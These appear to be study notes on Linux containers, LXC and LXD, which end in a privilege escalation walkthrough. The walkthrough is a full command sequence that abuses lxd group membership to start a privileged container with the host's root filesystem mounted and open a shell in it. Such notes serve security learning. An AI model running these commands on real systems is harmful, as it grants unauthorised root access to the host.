Skip to content

Linux Containers

  • containers operate at the OS level and VMs at the hardware level
  • Containers thus share an operating system and isolate application processes from the rest of the system, while classic virtualization allows multiple operating systems to run simultaneously on a single system.
  • isolation and virtualization are helpful

Linux Containers - LXC

  • LXC - os level vzation allowing multiple linux systems to run in isolation from each other.

LXD - Linux Daemon

  • designed to contain a complete OS.
  • system container and not an application container

Escalation steps

  • id
    • user needs to be a part of lxd,lxc group 108, 116
  • now, we can create a container on our machine and transfer it to the target or use an existing container on the target
    • admins can use templates that are insecure
    • if we find a tar.xz or zip template, we can import it if there is no password required
  • lxc image import ubuntu-template.tar.xz --alias ubuntutemp
  • lxc image list
    • check if imported
  • lxc init ubuntutemp privesc -c security.privileged=true
    • security.privileged flag to True means no isolation
  • lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
    • adding a container privesc with source / on /mnt/root
  • lxc start privesc
  • lxc exec privesc /bin/bash
  • Inside the container
    • ls -l /mnt/root